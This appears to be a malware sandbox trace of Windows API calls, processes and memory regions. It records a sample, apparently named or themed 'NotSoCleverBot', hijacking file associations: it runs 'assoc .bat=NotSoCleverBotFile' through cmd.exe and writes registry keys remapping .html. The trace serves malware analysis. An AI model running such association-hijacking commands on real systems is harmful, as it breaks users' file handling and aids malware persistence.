GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0264.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0264.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0264.141] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0264.141] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0264.141] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0264.142] GetProcessHeap () returned 0x700000 [0264.142] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x20c) returned 0x70a8a8 [0264.143] GetConsoleTitleW (in: lpConsoleTitle=0x70a8a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0264.150] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0264.150] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0264.150] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0264.150] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0264.150] GetProcessHeap () returned 0x700000 [0264.150] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400a) returned 0x70bc88 [0264.150] GetProcessHeap () returned 0x700000 [0264.151] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x70bc88) returned 1 [0264.151] _wcsicmp (_String1="assoc", _String2=")") returned 56 [0264.151] _wcsicmp (_String1="FOR", _String2="assoc") returned 5 [0264.151] _wcsicmp (_String1="FOR/?", _String2="assoc") returned 5 [0264.151] _wcsicmp (_String1="IF", _String2="assoc") returned 8 [0264.151] _wcsicmp (_String1="IF/?", _String2="assoc") returned 8 [0264.151] _wcsicmp (_String1="REM", _String2="assoc") returned 17 [0264.151] _wcsicmp (_String1="REM/?", _String2="assoc") returned 17 [0264.151] GetProcessHeap () returned 0x700000 [0264.151] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x70aac0 [0264.151] GetProcessHeap () returned 0x700000 [0264.151] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x14) returned 0x7077e0 [0264.152] GetProcessHeap () returned 0x700000 [0264.152] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x3c) returned 0x70ab20 [0264.153] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0264.154] _wcsicmp (_String1="assoc", _String2="DIR") returned -3 [0264.154] _wcsicmp (_String1="assoc", _String2="ERASE") returned -4 [0264.154] _wcsicmp (_String1="assoc", _String2="DEL") returned -3 [0264.154] _wcsicmp (_String1="assoc", _String2="TYPE") returned -19 [0264.154] _wcsicmp (_String1="assoc", _String2="COPY") returned -2 [0264.154] _wcsicmp (_String1="assoc", _String2="CD") returned -2 [0264.154] _wcsicmp (_String1="assoc", _String2="CHDIR") returned -2 [0264.154] _wcsicmp (_String1="assoc", _String2="RENAME") returned -17 [0264.154] _wcsicmp (_String1="assoc", _String2="REN") returned -17 [0264.154] _wcsicmp (_String1="assoc", _String2="ECHO") returned -4 [0264.154] _wcsicmp (_String1="assoc", _String2="SET") returned -18 [0264.154] _wcsicmp (_String1="assoc", _String2="PAUSE") returned -15 [0264.154] _wcsicmp (_String1="assoc", _String2="DATE") returned -3 [0264.154] _wcsicmp (_String1="assoc", _String2="TIME") returned -19 [0264.154] _wcsicmp (_String1="assoc", _String2="PROMPT") returned -15 [0264.154] _wcsicmp (_String1="assoc", _String2="MD") returned -12 [0264.154] _wcsicmp (_String1="assoc", _String2="MKDIR") returned -12 [0264.154] _wcsicmp (_String1="assoc", _String2="RD") returned -17 [0264.154] _wcsicmp (_String1="assoc", _String2="RMDIR") returned -17 [0264.154] _wcsicmp (_String1="assoc", _String2="PATH") returned -15 [0264.154] _wcsicmp (_String1="assoc", _String2="GOTO") returned -6 [0264.154] _wcsicmp (_String1="assoc", _String2="SHIFT") returned -18 [0264.154] _wcsicmp (_String1="assoc", _String2="CLS") returned -2 [0264.154] _wcsicmp (_String1="assoc", _String2="CALL") returned -2 [0264.154] _wcsicmp (_String1="assoc", _String2="VERIFY") returned -21 [0264.154] _wcsicmp (_String1="assoc", _String2="VER") returned -21 [0264.154] _wcsicmp (_String1="assoc", _String2="VOL") returned -21 [0264.155] _wcsicmp (_String1="assoc", _String2="EXIT") returned -4 [0264.155] _wcsicmp (_String1="assoc", _String2="SETLOCAL") returned -18 [0264.155] _wcsicmp (_String1="assoc", _String2="ENDLOCAL") returned -4 [0264.155] _wcsicmp (_String1="assoc", _String2="TITLE") returned -19 [0264.155] _wcsicmp (_String1="assoc", _String2="START") returned -18 [0264.155] _wcsicmp (_String1="assoc", _String2="DPATH") returned -3 [0264.155] _wcsicmp (_String1="assoc", _String2="KEYS") returned -10 [0264.155] _wcsicmp (_String1="assoc", _String2="MOVE") returned -12 [0264.155] _wcsicmp (_String1="assoc", _String2="PUSHD") returned -15 [0264.155] _wcsicmp (_String1="assoc", _String2="POPD") returned -15 [0264.155] _wcsicmp (_String1="assoc", _String2="ASSOC") returned 0 [0264.155] GetProcessHeap () returned 0x700000 [0264.155] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x70) returned 0x70ab68 [0264.157] GetProcessHeap () returned 0x700000 [0264.157] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x70ab68, Size=0x3c) returned 0x70ab68 [0264.157] GetProcessHeap () returned 0x700000 [0264.157] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x70ab68) returned 0x3c [0264.158] GetProcessHeap () returned 0x700000 [0264.158] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x48) returned 0x70abb0 [0264.158] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Classes", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19fa14 | out: phkResult=0x19fa14*=0xa0) returned 0x0 [0264.158] GetProcessHeap () returned 0x700000 [0264.158] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x70) returned 0x70ac00 [0264.160] GetProcessHeap () returned 0x700000 [0264.160] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x70ac00, Size=0x40) returned 0x70ac00 [0264.160] GetProcessHeap () returned 0x700000 [0264.160] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x70ac00) returned 0x40 [0264.160] GetProcessHeap () returned 0x700000 [0264.160] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x14) returned 0x707460 [0264.161] GetProcessHeap () returned 0x700000 [0264.161] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x2e) returned 0x70ac48 [0264.161] RegCreateKeyExW (in: hKey=0xa0, lpSubKey=".html", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x19f9cc, lpdwDisposition=0x0 | out: phkResult=0x19f9cc*=0xa4, lpdwDisposition=0x0) returned 0x0 [0264.161] RegSetValueExW (in: hKey=0xa4, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="NotSoCleverBotFile", cbData=0x26 | out: lpData="NotSoCleverBotFile") returned 0x0 [0264.161] RegCloseKey (hKey=0xa4) returned 0x0 [0264.161] _vsnwprintf (in: _Buffer=0xd37940, _BufferCount=0x1fff, _Format="%s=%s\r\n", _ArgList=0x19f9ac | out: _Buffer=".html=NotSoCleverBotFile\r\n") returned 26 [0264.162] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.162] GetFileType (hFile=0x3c) returned 0x2 [0264.162] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0264.162] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f984 | out: lpMode=0x19f984) returned 1 [0264.162] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.162] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd37940*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x19f99c, lpReserved=0x0 | out: lpBuffer=0xd37940*, lpNumberOfCharsWritten=0x19f99c*=0x1a) returned 1 [0264.163] ApiSetQueryApiSetPresence () returned 0x0 [0264.163] ResolveDelayLoadedAPI () returned 0x6ab62230 [0264.168] DoSHChangeNotify () returned 0x0 [0264.735] GetProcessHeap () returned 0x700000 [0264.735] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x70ac48) returned 1 [0264.735] GetProcessHeap () returned 0x700000 [0264.735] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x707460) returned 1 [0264.735] RegCloseKey (hKey=0xa0) returned 0x0 [0264.735] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.735] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0264.748] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.748] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0264.751] _get_osfhandle (_FileHandle=0) returned 0x38 [0264.751] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0264.804] SetConsoleInputExeNameW () returned 0x1 [0264.804] GetConsoleOutputCP () returned 0x1b5 [0264.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0264.890] SetThreadUILanguage (LangId=0x0) returned 0x409 [0265.123] exit (_Code=0) Thread: id = 158 os_tid = 0x944 Process: id = "20" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1fc86000" os_pid = "0xfbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x1024" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1891 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1892 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1893 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1894 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1895 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1896 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1897 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1898 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1899 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1900 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1901 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1902 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1903 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1904 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1905 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1906 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1907 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1908 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1909 start_va = 0x840000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1910 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1911 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1912 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1913 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1914 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1915 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1916 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1917 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1918 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1919 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1920 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1921 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1922 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1923 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1924 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1925 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1926 start_va = 0x990000 end_va = 0xb17fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 1927 start_va = 0xb20000 end_va = 0xca0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 1928 start_va = 0xcb0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 1929 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1930 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1931 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1932 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1933 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1934 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1935 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1936 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1937 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1938 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1939 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1940 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1941 start_va = 0x680000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1942 start_va = 0x20b0000 end_va = 0x23e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1943 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1944 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1945 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 1946 start_va = 0x680000 end_va = 0x6d9fff monitored = 1 entry_point = 0x6953f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1947 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 1948 start_va = 0x23f0000 end_va = 0x2604fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 1949 start_va = 0x2610000 end_va = 0x2827fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 1950 start_va = 0x840000 end_va = 0x94afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1951 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1952 start_va = 0x2830000 end_va = 0x2a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 1953 start_va = 0x2a50000 end_va = 0x2b62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 1954 start_va = 0x680000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1955 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1956 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1957 start_va = 0x2b70000 end_va = 0x2c2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 1958 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1959 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1960 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1961 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1962 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1963 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1964 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1965 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1966 start_va = 0x600000 end_va = 0x600fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1967 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1968 start_va = 0x610000 end_va = 0x611fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1969 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1970 start_va = 0x620000 end_va = 0x620fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1971 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Thread: id = 154 os_tid = 0xc18 Thread: id = 155 os_tid = 0xc04 Thread: id = 156 os_tid = 0x64c Thread: id = 157 os_tid = 0xb0 Process: id = "21" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3609000" os_pid = "0x45c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C assoc .bat=NotSoCleverBotFile" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2016 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2017 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2018 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2019 start_va = 0x60000 end_va = 